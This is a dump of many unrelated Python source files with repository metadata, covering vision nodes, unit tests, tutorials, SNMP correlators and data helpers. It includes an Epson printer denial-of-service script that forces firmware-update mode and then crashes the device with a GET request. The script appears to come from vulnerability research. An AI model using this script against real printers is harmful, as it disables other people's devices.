"""
Estimates the 3D coordinates of an object given a 2D bounding box
"""
from typing import Dict, Any
import numpy as np
from peekingduck.pipeline.nodes.node import AbstractNode
class Node(AbstractNode):
"""Node that uses 2D bounding boxes information to estimate 3D location.
Inputs:
|bboxes|
Outputs:
|obj_3D_locs|
Configs:
focal_length (:obj:`float`): **default = 1.14**
Approximate focal length of webcam used, in metres. Example on measuring focal length:
https://learnopencv.com/approximate-focal-length-for-webcams-and-cell-phone-cameras/
height_factor (:obj:`float`): **default = 2.5**
A factor used to estimate real-world distance from pixels, based on average human height
in metres. The value varies across different camera set-ups, and calibration may be
required.
"""
def run(self, inputs: Dict[str, Any]) -> Dict[str, Any]:
"""Converts 2D bounding boxes into 3D locations.
"""
locations = []
for bbox in inputs["bboxes"]:
# Subtraction is to make the camera the origin of the coordinate system
center_2d = ((bbox[0:2] + bbox[2:4]) * 0.5) - np.array([0.5, 0.5])
bbox_height = bbox[3] - bbox[1]
z_coord = (self.focal_length * self.height_factor) / bbox_height
x_coord = (center_2d[0] * self.height_factor) / bbox_height
y_coord = (center_2d[1] * self.height_factor) / bbox_height
point = np.array([x_coord, y_coord, z_coord])
locations.append(point)
outputs = {"obj_3D_locs": locations}
return outputs
| 33.971831 | 100 | 0.659204 | # Copyright 2021 AI Singapore
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Estimates the 3D coordinates of an object given a 2D bounding box
"""
from typing import Dict, Any
import numpy as np
from peekingduck.pipeline.nodes.node import AbstractNode
class Node(AbstractNode):
"""Node that uses 2D bounding boxes information to estimate 3D location.
Inputs:
|bboxes|
Outputs:
|obj_3D_locs|
Configs:
focal_length (:obj:`float`): **default = 1.14**
Approximate focal length of webcam used, in metres. Example on measuring focal length:
https://learnopencv.com/approximate-focal-length-for-webcams-and-cell-phone-cameras/
height_factor (:obj:`float`): **default = 2.5**
A factor used to estimate real-world distance from pixels, based on average human height
in metres. The value varies across different camera set-ups, and calibration may be
required.
"""
def __init__(self, config: Dict[str, Any] = None, **kwargs: Any) -> None:
super().__init__(config, node_path=__name__, **kwargs)
def run(self, inputs: Dict[str, Any]) -> Dict[str, Any]:
"""Converts 2D bounding boxes into 3D locations.
"""
locations = []
for bbox in inputs["bboxes"]:
# Subtraction is to make the camera the origin of the coordinate system
center_2d = ((bbox[0:2] + bbox[2:4]) * 0.5) - np.array([0.5, 0.5])
bbox_height = bbox[3] - bbox[1]
z_coord = (self.focal_length * self.height_factor) / bbox_height
x_coord = (center_2d[0] * self.height_factor) / bbox_height
y_coord = (center_2d[1] * self.height_factor) / bbox_height
point = np.array([x_coord, y_coord, z_coord])
locations.append(point)
outputs = {"obj_3D_locs": locations}
return outputs
| 115 | 0 | 27 |
9602435d9907a9497d021fa9099436c498c55a95 | 2,731 | py | Python | tests/test_file_configuration.py | joshua-s/punch | c29751844ecf654cc21966a14842e8165e0bc300 | [
"ISC"
] | null | null | null | tests/test_file_configuration.py | joshua-s/punch | c29751844ecf654cc21966a14842e8165e0bc300 | [
"ISC"
] | null | null | null | tests/test_file_configuration.py | joshua-s/punch | c29751844ecf654cc21966a14842e8165e0bc300 | [
"ISC"
] | null | null | null | import pytest
from punch import file_configuration as fc
@pytest.fixture
@pytest.fixture
@pytest.fixture
| 26.259615 | 73 | 0.660198 | import pytest
from punch import file_configuration as fc
@pytest.fixture
def global_variables():
return {
'serializer': '{{ major }}.{{ minor }}.{{ patch }}',
'mark': 'just a mark'
}
@pytest.fixture
def local_variables():
return {
'serializer': '{{ major }}.{{ minor }}'
}
@pytest.fixture
def file_configuration_dict():
return {
'path': 'pkg/__init__.py',
'serializer': '{{ major }}.{{ minor }}'
}
def test_file_configuration_from_string_local_variables_take_precedence(
local_variables, global_variables):
fconf = fc.FileConfiguration(
'pkg/__init__.py',
local_variables,
global_variables
)
assert fconf.path == 'pkg/__init__.py'
assert fconf.config['serializer'] == '{{ major }}.{{ minor }}'
assert fconf.config['mark'] == 'just a mark'
def test_file_configuration_from_string_can_include_global_variables(
global_variables):
local_variables = {
'serializer': '__version__ = {{GLOBALS.serializer}}'
}
fconf = fc.FileConfiguration(
'pkg/__init__.py',
local_variables,
global_variables
)
assert fconf.path == 'pkg/__init__.py'
assert fconf.config['serializer'] == \
'__version__ = {{ major }}.{{ minor }}.{{ patch }}'
assert fconf.config['mark'] == 'just a mark'
def test_file_conf_fr_str_path_cannot_be_overridden_by_global_variables(
local_variables, global_variables):
global_variables['path'] = 'a/new/path'
fconf = fc.FileConfiguration(
'pkg/__init__.py',
local_variables,
global_variables
)
assert fconf.path == 'pkg/__init__.py'
def test_file_conf_fr_str_path_cannot_be_overridden_by_local_variables(
local_variables, global_variables):
local_variables['path'] = 'a/new/path'
fconf = fc.FileConfiguration(
'pkg/__init__.py',
local_variables,
global_variables
)
assert fconf.path == 'pkg/__init__.py'
def test_file_configuration_from_dict_local_variables_take_precedence(
file_configuration_dict, global_variables):
fconf = fc.FileConfiguration.from_dict(
file_configuration_dict,
global_variables
)
assert fconf.path == 'pkg/__init__.py'
assert fconf.config['serializer'] == '{{ major }}.{{ minor }}'
assert fconf.config['mark'] == 'just a mark'
def test_file_conf_fr_dict_path_cannot_be_overridden_by_global_variables(
file_configuration_dict, global_variables):
global_variables['path'] = 'a/new/path'
fconf = fc.FileConfiguration.from_dict(
file_configuration_dict,
global_variables
)
assert fconf.path == 'pkg/__init__.py'
| 2,409 | 0 | 204 |
8ec8aa9f78ea04bedaeab8a98c76a25bdf0902ea | 1,584 | py | Python | 02. oop-instance-class-static-methods.py | surajitrana1985/python-oops | 08b93af2bb8bb32f85bb37c68c91aa30a8dbf7ad | [
"MIT"
] | null | null | null | 02. oop-instance-class-static-methods.py | surajitrana1985/python-oops | 08b93af2bb8bb32f85bb37c68c91aa30a8dbf7ad | [
"MIT"
] | null | null | null | 02. oop-instance-class-static-methods.py | surajitrana1985/python-oops | 08b93af2bb8bb32f85bb37c68c91aa30a8dbf7ad | [
"MIT"
] | null | null | null | import datetime
emp1 = Employee.from_string("Jason-Gibbs-jason.gibbs@hotmail.com-36000")
emp2 = Employee.from_string("Mason-Storm-mason.storm@gmail.com-45000")
emp3 = Employee.from_string("Kelvin-Hobbs-kelvin.hobbs@yahoomail.com-89000")
Employee.set_raise()
emp1.apply_raise()
emp2.apply_raise()
emp3.apply_raise()
print("Employee 1 fullname is:", emp1.get_full_name(), "created at", emp1.timestamp, "salary is $", float(emp1.pay))
print("Employee 2 fullname is:", emp2.get_full_name(), "created at", emp2.timestamp, "salary is $", float(emp2.pay))
print("Employee 3 fullname is:", emp3.get_full_name(), "created at", emp3.timestamp, "salary is $", float(emp3.pay))
| 29.886792 | 116 | 0.67803 | import datetime
class Employee:
raise_pay = 1.04
# constructor method
def __init__(self, first_name, last_name, email, pay):
self.first_name = first_name
self.last_name = last_name
self.email = email
self.pay = pay
self.timestamp = Employee.get_timestamp()
# instance method
def get_full_name(self):
return '{} {}'.format(self.first_name, self.last_name)
# instance method
def apply_raise(self):
self.pay = self.raise_pay * float(self.pay)
# class method
@classmethod # decorator
def from_string(cls, employee_str):
fname, lname, email, pay = employee_str.split("-")
return cls(fname, lname, email, pay)
# class method
@classmethod
def set_raise(cls):
cls.raise_pay = 1.07
# static method
@staticmethod # decorator
def get_timestamp():
return datetime.datetime.now()
emp1 = Employee.from_string("Jason-Gibbs-jason.gibbs@hotmail.com-36000")
emp2 = Employee.from_string("Mason-Storm-mason.storm@gmail.com-45000")
emp3 = Employee.from_string("Kelvin-Hobbs-kelvin.hobbs@yahoomail.com-89000")
Employee.set_raise()
emp1.apply_raise()
emp2.apply_raise()
emp3.apply_raise()
print("Employee 1 fullname is:", emp1.get_full_name(), "created at", emp1.timestamp, "salary is $", float(emp1.pay))
print("Employee 2 fullname is:", emp2.get_full_name(), "created at", emp2.timestamp, "salary is $", float(emp2.pay))
print("Employee 3 fullname is:", emp3.get_full_name(), "created at", emp3.timestamp, "salary is $", float(emp3.pay))
| 507 | 382 | 23 |
98d9774606907256c71e47bc2d5cfa9e19d08a9f | 1,978 | py | Python | env/lib/python2.7/site-packages/future/tests/test_import_star.py | talishte/ctigre | 1da8e56e716d84cc3ad7773c52267d0d53bd0d04 | [
"BSD-2-Clause"
] | null | null | null | env/lib/python2.7/site-packages/future/tests/test_import_star.py | talishte/ctigre | 1da8e56e716d84cc3ad7773c52267d0d53bd0d04 | [
"BSD-2-Clause"
] | null | null | null | env/lib/python2.7/site-packages/future/tests/test_import_star.py | talishte/ctigre | 1da8e56e716d84cc3ad7773c52267d0d53bd0d04 | [
"BSD-2-Clause"
] | null | null | null | """
This tests whether
from future.builtins import *
works as expected:
- This should NOT introduce namespace pollution on Py3.
- On Python 2, this should not introduce any symbols that aren't in
__builtin__.
"""
from __future__ import absolute_import, print_function, unicode_literals
import copy
from future import utils
from future.tests.base import unittest
original_locals = set(copy.copy(locals()))
original_globals = set(copy.copy(globals()))
new_names = set(['original_locals', 'original_globals', 'new_names'])
from future.builtins import *
new_locals = set(copy.copy(locals())) - new_names - original_locals
new_globals = set(copy.copy(globals())) - new_names - original_globals - \
set(['new_locals'])
if __name__ == '__main__':
unittest.main()
| 29.522388 | 78 | 0.666835 | """
This tests whether
from future.builtins import *
works as expected:
- This should NOT introduce namespace pollution on Py3.
- On Python 2, this should not introduce any symbols that aren't in
__builtin__.
"""
from __future__ import absolute_import, print_function, unicode_literals
import copy
from future import utils
from future.tests.base import unittest
original_locals = set(copy.copy(locals()))
original_globals = set(copy.copy(globals()))
new_names = set(['original_locals', 'original_globals', 'new_names'])
from future.builtins import *
new_locals = set(copy.copy(locals())) - new_names - original_locals
new_globals = set(copy.copy(globals())) - new_names - original_globals - \
set(['new_locals'])
class TestImportStar(unittest.TestCase):
def test_namespace_pollution_locals(self):
if utils.PY3:
self.assertEqual(len(new_locals), 0,
'namespace pollution: {0}'.format(new_locals))
else:
pass # maybe check that no new symbols are introduced
def test_namespace_pollution_globals(self):
if utils.PY3:
self.assertEqual(len(new_globals), 0,
'namespace pollution: {0}'.format(new_globals))
else:
pass # maybe check that no new symbols are introduced
def test_iterators(self):
self.assertNotEqual(type(range(10)), list)
def test_super(self):
pass
def test_python3_stdlib_imports(self):
# These should fail on Py2
import queue
import socketserver
def test_str(self):
self.assertIsNot(str, bytes) # Py2: assertIsNot only in 2.7
self.assertEqual(str('blah'), u'blah') # Py3.3 and Py2 only
def test_python_2_unicode_compatible_decorator(self):
# This should not be in the namespace
assert 'python_2_unicode_compatible' not in locals()
if __name__ == '__main__':
unittest.main()
| 957 | 19 | 211 |
a0d2e4380cddc23ff59fec189f236b132814990c | 1,155 | py | Python | algorithms/Arrays/closest3sum.py | gadodia/Algorithms | 714d43ce89b684d8e5c4bb77a654938957957f33 | [
"MIT"
] | null | null | null | algorithms/Arrays/closest3sum.py | gadodia/Algorithms | 714d43ce89b684d8e5c4bb77a654938957957f33 | [
"MIT"
] | null | null | null | algorithms/Arrays/closest3sum.py | gadodia/Algorithms | 714d43ce89b684d8e5c4bb77a654938957957f33 | [
"MIT"
] | null | null | null | import collections
'''
This problem was recently asked by Google:
Given a list of numbers and a target number n, find 3 numbers combinatins in the list that sums closest to the target number n. There may be multiple ways of creating the sum closest to the target number, you can return any combination in any order.
Time: O(nlogn) + O(n2) = O(n2)
Space: O(n)
'''
print(Solution().closest_3_sum([2, 1, -5, 4], -1))
# (1, [[-5, 1, 4], [-5, 1, 2]]) | 30.394737 | 249 | 0.54632 | import collections
'''
This problem was recently asked by Google:
Given a list of numbers and a target number n, find 3 numbers combinatins in the list that sums closest to the target number n. There may be multiple ways of creating the sum closest to the target number, you can return any combination in any order.
Time: O(nlogn) + O(n2) = O(n2)
Space: O(n)
'''
class Solution:
def closest_3_sum(self, nums, target):
if not nums:
return None
distance = float("inf")
res_set = collections.defaultdict(list)
nums.sort()
for i in range(len(nums)):
j = i + 1
k = len(nums)-1
while j < k:
cur_sum = nums[i]+nums[j]+nums[k]
if abs(cur_sum-target) <= distance:
distance = abs(cur_sum-target)
res_set[distance].append([nums[i], nums[j], nums[k]])
if cur_sum > target:
k -= 1
else:
j += 1
return distance, res_set.get(distance)
print(Solution().closest_3_sum([2, 1, -5, 4], -1))
# (1, [[-5, 1, 4], [-5, 1, 2]]) | 659 | -6 | 50 |
be7c1bdbe72f5af36c98b4bdd62ae9afb152bdeb | 2,614 | py | Python | hyperparameter_tuner/oracle.py | aierh/autoML | 8e31966edf6de2c223d5eeb6cd4b4dbd6ddbbf77 | [
"MIT"
] | 185 | 2019-12-26T12:41:53.000Z | 2020-09-18T06:22:32.000Z | hyperparameter_tuner/oracle.py | aierh/autoML | 8e31966edf6de2c223d5eeb6cd4b4dbd6ddbbf77 | [
"MIT"
] | 8 | 2020-02-25T19:32:22.000Z | 2020-09-18T06:17:48.000Z | hyperparameter_tuner/oracle.py | aierh/autoML | 8e31966edf6de2c223d5eeb6cd4b4dbd6ddbbf77 | [
"MIT"
] | 27 | 2019-12-26T15:02:47.000Z | 2020-09-08T21:24:54.000Z | from .trial import generate_trial_id
import random
import hashlib
import pandas as pd
| 35.324324 | 83 | 0.572686 | from .trial import generate_trial_id
import random
import hashlib
import pandas as pd
class Oracle:
def __init__(self, space, max_epochs, max_trials=None):
self.max_epochs = max_epochs
self.space = space
self.trials = {}
self._tried_so_far = set()
self.max_trials = max_trials
self.are_metrics = False
self._max_collisions = 20
def create_trial(self):
trial_id = generate_trial_id()
if self.are_metrics:
df = pd.DataFrame(self.trials)
temp_df = df.loc['metrics'].dropna().apply(lambda x: x['val_accuracy'])
if self.max_trials is not None and len(self.trials) >= self.max_trials:
status = 'STOPPED'
values = None
elif self.are_metrics and temp_df.max() > 0.998:
status = 'STOPPED'
values = None
else:
response = self._populate_space(trial_id)
if response is None:
status = 'STOPPED'
values = None
else:
status = response['status']
values = response['values'] if 'values' in response else None
if values is not None:
self.trials[trial_id] = {'hp_values': values}
return trial_id, values, status
def update_metrics(self, ongoing_trials):
for trial_id, trial in ongoing_trials.items():
self.trials[trial_id]['metrics'] = trial['metrics']
self.trials[trial_id]['meta_checkpoint'] = trial['meta_checkpoint']
def _populate_space(self, trial_id):
collisions = 0
while 1:
# Generate a set of random values.
values = {}
for p in self.space:
values[p['name']] = random.choice(p['values'])
values_hash = self._compute_values_hash(values)
if values_hash in self._tried_so_far:
collisions += 1
if collisions > self._max_collisions:
return None
continue
self._tried_so_far.add(values_hash)
values['hyperparameter_tuner/new_trial_id'] = trial_id
values['hyperparameter_tuner/epochs'] = self.max_epochs
values['hyperparameter_tuner/initial_epoch'] = 0
break
return {'status': 'RUNNING',
'values': values}
def _compute_values_hash(self, values):
keys = sorted(values.keys())
s = ''.join(str(k) + '=' + str(values[k]) for k in keys)
return hashlib.sha256(s.encode('utf-8')).hexdigest()[:32]
| 2,377 | -8 | 158 |
d3a5f9354952f5c8131ea23b89af9878604703b2 | 555 | py | Python | app/helpers/__init__.py | peterhil/ninhursag | 582133ae51e98b2e4272d6a78794b08aed845960 | [
"MIT"
] | 4 | 2015-05-24T20:39:54.000Z | 2021-06-23T06:48:23.000Z | app/helpers/__init__.py | peterhil/ninhursag | 582133ae51e98b2e4272d6a78794b08aed845960 | [
"MIT"
] | 10 | 2021-03-23T01:11:49.000Z | 2021-06-22T23:58:36.000Z | app/helpers/__init__.py | peterhil/ninhursag | 582133ae51e98b2e4272d6a78794b08aed845960 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# from flask_security import login_required
from functools import wraps
from .blueprints import register_blueprints
from .slugify import slugify
from app.settings import project_name
try: from instance.settings import project_name
except ImportError: pass
| 22.2 | 47 | 0.673874 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# from flask_security import login_required
from functools import wraps
from .blueprints import register_blueprints
from .slugify import slugify
from app.settings import project_name
try: from instance.settings import project_name
except ImportError: pass
def route(bp, *args, **kwargs):
def decorator(f):
@bp.route(*args, **kwargs)
# @login_required
@wraps(f)
def wrapper(*args, **kwargs):
return f(*args, **kwargs)
return f
return decorator
| 226 | 0 | 23 |
01cf8a14c4fab83d98f40dd99d9c64a350d27566 | 600 | py | Python | src/DoS/dos_firmware.py | bstnbuck/Epson-Printer-vulnerabilities | 9c9b88c3bf36472a3f805b42c30d95894e93c73f | [
"MIT"
] | 3 | 2021-11-09T16:10:46.000Z | 2022-01-18T16:40:37.000Z | src/DoS/dos_firmware.py | bstnbuck/Epson-Printer-vulnerabilities | 9c9b88c3bf36472a3f805b42c30d95894e93c73f | [
"MIT"
] | null | null | null | src/DoS/dos_firmware.py | bstnbuck/Epson-Printer-vulnerabilities | 9c9b88c3bf36472a3f805b42c30d95894e93c73f | [
"MIT"
] | null | null | null | import requests
if __name__ == '__main__':
main() | 26.086957 | 92 | 0.666667 | import requests
def requestFirmwareUpdate():
url = 'http://141.87.29.101/FIRMWAREUPDATE'
requests.get(url)
def triggerDos():
url = 'http://141.87.29.101/DOWN/FIRMWAREUPDATE/ROM1'
try:
# epson printer recive firmware file by `post` method, but `get` method trigger dos.
requests.get(url, timeout=5)
except:
pass
def main():
# request firmware update mode, printer will ready to recieve firmware file
requestFirmwareUpdate()
# just requesting `get` to upload url not `post`, dos occurs.
triggerDos()
if __name__ == '__main__':
main() | 477 | 0 | 69 |
f6532607c371bb53057566607b9bfbeaf107127d | 1,084 | py | Python | homeworkpal_project/maximo/migrations/0002_datadocument.py | luiscberrocal/homeworkpal | 342acf876264fade818b107f4af13cac067f1ace | [
"MIT"
] | null | null | null | homeworkpal_project/maximo/migrations/0002_datadocument.py | luiscberrocal/homeworkpal | 342acf876264fade818b107f4af13cac067f1ace | [
"MIT"
] | null | null | null | homeworkpal_project/maximo/migrations/0002_datadocument.py | luiscberrocal/homeworkpal | 342acf876264fade818b107f4af13cac067f1ace | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import model_utils.fields
import django.utils.timezone
| 34.967742 | 147 | 0.610701 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import model_utils.fields
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('maximo', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='DataDocument',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
('docfile', models.FileField(upload_to='maximo_documents/%Y/%m/%d')),
('processed', models.DateTimeField()),
('extension', models.CharField(max_length=5)),
],
options={
'abstract': False,
},
),
]
| 0 | 899 | 23 |
256033a277a7efd83c664f7091741ead5c4842a3 | 137 | py | Python | tests/test_app.py | aracnid/i-xero2 | 449bb8bccb9e76935cedc49eff776bb8804d756b | [
"MIT"
] | null | null | null | tests/test_app.py | aracnid/i-xero2 | 449bb8bccb9e76935cedc49eff776bb8804d756b | [
"MIT"
] | null | null | null | tests/test_app.py | aracnid/i-xero2 | 449bb8bccb9e76935cedc49eff776bb8804d756b | [
"MIT"
] | null | null | null | """Application tests.
"""
import i_xero2
def test_version():
"""Test the version of the app.
"""
assert i_xero2.__version__
| 15.222222 | 35 | 0.656934 | """Application tests.
"""
import i_xero2
def test_version():
"""Test the version of the app.
"""
assert i_xero2.__version__
| 0 | 0 | 0 |
e9ca1648d91deb910529ad55e8d5f08e7de02539 | 5,687 | py | Python | esmond/api/tests/test_correlator.py | esnet/esmond-test | 8aaec580e8fa8a27bddddc0fd91fd3e96730515f | [
"BSD-3-Clause-LBNL"
] | null | null | null | esmond/api/tests/test_correlator.py | esnet/esmond-test | 8aaec580e8fa8a27bddddc0fd91fd3e96730515f | [
"BSD-3-Clause-LBNL"
] | null | null | null | esmond/api/tests/test_correlator.py | esnet/esmond-test | 8aaec580e8fa8a27bddddc0fd91fd3e96730515f | [
"BSD-3-Clause-LBNL"
] | null | null | null | from django.test import TestCase
from esmond.poll import IfDescrCorrelator, JnxFirewallCorrelator, \
JnxCOSCorrelator, SentryCorrelator, \
ALUSAPCorrelator
#def test_jnx_cos_correlator():
# s = MockSession()
# c = JnxCOSCorrelator(s)
# c.setup()
# for (var,val,check) in s.walk('jnxCosIfqQedBytes'):
# assert check == c.lookup('jnxCosIfqQedBytes', var)
| 45.496 | 90 | 0.495516 | from django.test import TestCase
from esmond.poll import IfDescrCorrelator, JnxFirewallCorrelator, \
JnxCOSCorrelator, SentryCorrelator, \
ALUSAPCorrelator
class MockSession(object):
def walk(self, oid):
if oid == 'ifDescr':
return (('ifDescr.115', 'ae0'),
('ifDescr.116', 'ge-1/0/0'),
('ifDescr.117', ''))
if oid == 'ifAlias':
return (('ifAlias.115', 'ae0'),
('ifAlias.116', 'ge-1/0/0'),
('ifAlias.117', ''))
elif oid == 'ifHCInOctets':
return (('ifHCInOctets.115', '0', ['ifHCInOctets', 'ae0']),
('ifHCInOctets.116', '732401229666',['ifHCInOctets', 'ge-1/0/0']),
('ifHCInOctets.117', '732401229666', None))
elif oid == 'jnxCosIfqQedBytes':
return (('jnxCosIfqQedBytes.116."best-effort"', '2091263919975',
["ge-1/0/0", "jnxCosIfqQedBytes", "best-effort"]),
('jnxCosIfqQedBytes.116."network-control"', '325426106',
["ge-1/0/0", "jnxCosIfqQedBytes", "network-control"]),
('jnxCosIfqQedBytes.116."scavenger-service"', '17688108277',
["ge-1/0/0", "jnxCosIfqQedBytes", "scavenger-service"]),
('jnxCosIfqQedBytes.116."expedited-forwarding"', '1026807',
["ge-1/0/0", "jnxCosIfqQedBytes", "expedited-forwarding"]),
('jnxCosIfqQedBytes.117."best-effort"', '2091263919975',
None),
('jnxCosIfqQedBytes.117."network-control"', '325426106',
None),
('jnxCosIfqQedBytes.117."scavenger-service"', '17688108277',
None),
('jnxCosIfqQedBytes.117."expedited-forwarding"', '1026807',
None))
elif oid == 'jnxFWCounterByteCount':
return (('jnxFWCounterByteCount."fnal-test"."fnal".counter',
'0', ["counter", "fnal-test", "fnal"]),
('jnxFWCounterByteCount."fnal-test"."discard".counter',
'0', ["counter", "fnal-test", "discard"]),
('jnxFWCounterByteCount."test-from-eqx"."from-eqx".counter',
'0', ["counter", "test-from-eqx", "from-eqx"]))
elif oid == 'outletID':
return (
('outletID.1.1.1','AA1'),
('outletID.1.1.2','AA2'),
)
elif oid == 'outletLoadValue':
return (
('outletLoadValue.1.1.1','0',
["outletLoadValue", "AA1"]),
('outletLoadValue.1.1.2','0',
["outletLoadValue", "AA2"]),
)
elif oid == 'tempHumidSensorID':
return (
('tempHumidSensorID.1.1','A1'),
('tempHumidSensorID.1.2','A2'),
)
elif oid == 'tempHumidSensorTempValue':
return (
('tempHumidSensorTempValue.1.1','780',
["tempHumidSensorTempValue", "A1"]),
('tempHumidSensorTempValue.1.2','735',
["tempHumidSensorTempValue", "A2"]),
)
elif oid == 'tempHumidSensorHumidValue':
return (
('tempHumidSensorHumidValue.1.1','38',
["tempHumidSensorHumidValue", "A1"]),
('tempHumidSensorHumidValue.1.2','47',
["tempHumidSensorHumidValue", "A2"]),
)
elif oid == 'outletName':
return (
('outletName.1.1.1', 'TowerA_InfeedA_Outlet1', ["outletName", "AA1"]),
('outletName.1.1.2', 'TowerA_InfeedA_Outlet2', ["outletName", "AA2"]),
)
elif oid == 'sapBaseStatsEgressQchipForwardedOutProfOctets':
return (
('sapBaseStatsEgressQchipForwardedOutProfOctets.834.102793216.834',
0L,
["sapBaseStatsEgressQchipForwardedOutProfOctets",
"834-3/1/1-834"]),
)
class MockOID(object):
def __repr__(self):
return "MockOID('%s')" % self.name
def __init__(self, name):
self.name = name
class TestCorrelators(TestCase):
def test_correlators(self):
for (correlator, oid) in (
(IfDescrCorrelator, MockOID('ifHCInOctets')),
(JnxFirewallCorrelator, MockOID('jnxFWCounterByteCount')),
(JnxCOSCorrelator, MockOID('jnxCosIfqQedBytes')),
(SentryCorrelator, MockOID('outletLoadValue')),
(SentryCorrelator, MockOID('tempHumidSensorTempValue')),
(SentryCorrelator, MockOID('tempHumidSensorHumidValue')),
(SentryCorrelator, MockOID('outletName')),
(ALUSAPCorrelator, MockOID('sapBaseStatsEgressQchipForwardedOutProfOctets')),
):
s = MockSession()
c = correlator()
setup_data = []
for oid_name in c.oids:
setup_data.extend(s.walk(oid_name))
c.setup(setup_data)
for (var,val,check) in s.walk(oid.name):
self.assertEqual(check, c.lookup(oid, var))
#def test_jnx_cos_correlator():
# s = MockSession()
# c = JnxCOSCorrelator(s)
# c.setup()
# for (var,val,check) in s.walk('jnxCosIfqQedBytes'):
# assert check == c.lookup('jnxCosIfqQedBytes', var)
| 5,066 | 17 | 173 |
ef83386aa4f0d57c0d5a33e9362aa865c04a2323 | 3,836 | py | Python | test/harness/VerboseOutput.py | adamrehn/language-toolbox | f86c39784b2a6952719afdd7c3769a6a6b5f2630 | [
"MIT"
] | 2 | 2018-12-18T07:53:06.000Z | 2020-02-28T11:13:21.000Z | test/harness/VerboseOutput.py | adamrehn/language-toolbox | f86c39784b2a6952719afdd7c3769a6a6b5f2630 | [
"MIT"
] | null | null | null | test/harness/VerboseOutput.py | adamrehn/language-toolbox | f86c39784b2a6952719afdd7c3769a6a6b5f2630 | [
"MIT"
] | null | null | null | from . import common_pb2 as common_messages
from contextlib import redirect_stdout
from .Utility import Utility
import json, io
| 31.186992 | 119 | 0.703858 | from . import common_pb2 as common_messages
from contextlib import redirect_stdout
from .Utility import Utility
import json, io
class VerboseOutput:
@staticmethod
def _extractCapabilities(capabilities):
'''
Extracts the list of capabilities from the LanguageCapabilities message bitfield
'''
capabilitiesDict = dict(common_messages.Capabilities.items())
return Utility.extractFlags(capabilities, capabilitiesDict)
@staticmethod
def _stringifyTestCaseResult(result):
'''
Returns a string representation of a TestCaseResult object
'''
return json.dumps({
"output": result.output,
"type": result.type,
"exception": result.exception
})
@staticmethod
def ListCapabilities(response):
'''
Verbose output printer for ListCapabilities() RPC results
'''
buf = io.StringIO()
with redirect_stdout(buf):
print('Server capabilities:')
for item in response.capabilities:
capabilitiesList = ', '.join(VerboseOutput._extractCapabilities(item.capabilities))
print('\t{} ({})'.format(item.language, capabilitiesList))
return buf.getvalue().strip()
@staticmethod
def GenerateAst(response):
'''
Verbose output printer for GenerateAst() RPC results
'''
buf = io.StringIO()
with redirect_stdout(buf):
print('Generate AST results:')
print('\tError: {}'.format(response.error))
print('\tAST: {}'.format(response.ast))
return buf.getvalue().strip()
@staticmethod
def PerformAstMatch(response):
'''
Verbose output printer for PerformAstMatch() RPC results
'''
buf = io.StringIO()
with redirect_stdout(buf):
print('Perform AST Match results:')
print('\tError: {}'.format(response.error))
print('\tAST: {}'.format(response.ast))
print('\tMatches: {}'.format(response.matches))
return buf.getvalue().strip()
@staticmethod
def PerformIOMatch(response):
'''
Verbose output printer for PerformIOMatch() RPC results
'''
buf = io.StringIO()
with redirect_stdout(buf):
print('Perform I/O Matching results:')
print('\tError: {}'.format(response.error))
print('\tstdout: {}'.format(response.stdout))
print('\tstderr: {}'.format(response.stderr))
print('\tStdout Matches: {}'.format(response.matchesStdOut))
print('\tStderr Matches: {}'.format(response.matchesStdErr))
return buf.getvalue().strip()
@staticmethod
def PerformCompoundIOMatch(response):
'''
Verbose output printer for PerformCompoundIOMatch() RPC results
'''
buf = io.StringIO()
with redirect_stdout(buf):
print('Perform compound I/O Matching results:')
print('\tError: {}'.format(response.error))
print('\tResults:\n')
return buf.getvalue() + '\n'.join([VerboseOutput.PerformIOMatch(result) for result in response.results])
@staticmethod
def PerformUnitTests(response):
'''
Verbose output printer for PerformUnitTests() RPC results
'''
buf = io.StringIO()
with redirect_stdout(buf):
print('Unit test results:')
print('\tError: {}'.format(response.error))
print('\tPassed: {}'.format(response.passed))
print('\tFailed: {}'.format(response.failed))
print('\tPass/fail vectors:')
for vec in response.results:
print('\t\t[{}]'.format(','.join([str(passed) for passed in vec.passed])))
print('\tResult vectors:')
for vec in response.results:
print('\t\t[{}]'.format(','.join(list([VerboseOutput._stringifyTestCaseResult(result) for result in vec.result]))))
return buf.getvalue().strip()
@staticmethod
def InvokeCustomSandbox(response):
'''
Verbose output printer for InvokeCustomSandbox() RPC results
'''
buf = io.StringIO()
with redirect_stdout(buf):
print('Invoke custom sandbox results:')
print('\tError: {}'.format(response.error))
print('\tstdout: {}'.format(response.stdout))
print('\tstderr: {}'.format(response.stderr))
return buf.getvalue().strip()
| 0 | 3,685 | 23 |
5228d1bb504d38bdf6aaa7f03736262ba215e1e0 | 1,618 | py | Python | app/data/func.py | stanmain/IION-Flask-Test | ddd68706ee06eacb17ad461a9d31087b87217769 | [
"MIT"
] | null | null | null | app/data/func.py | stanmain/IION-Flask-Test | ddd68706ee06eacb17ad461a9d31087b87217769 | [
"MIT"
] | null | null | null | app/data/func.py | stanmain/IION-Flask-Test | ddd68706ee06eacb17ad461a9d31087b87217769 | [
"MIT"
] | null | null | null | # Copyright © 2018 Stanislav Hnatiuk. All rights reserved.
"""Module of functions."""
from operator import itemgetter
from itertools import groupby
def stime_to_decimal(s):
"""Lololo."""
return s.hour + s.minute / 60
def group_time(records):
"""Lololo."""
records.sort(key=itemgetter(6, 1))
result = [
[stime_to_decimal(time), *[item[0] for item in group]]
for time, group in groupby(records, key=itemgetter(6))
]
return result
def group_sensor(records):
"""Lololo."""
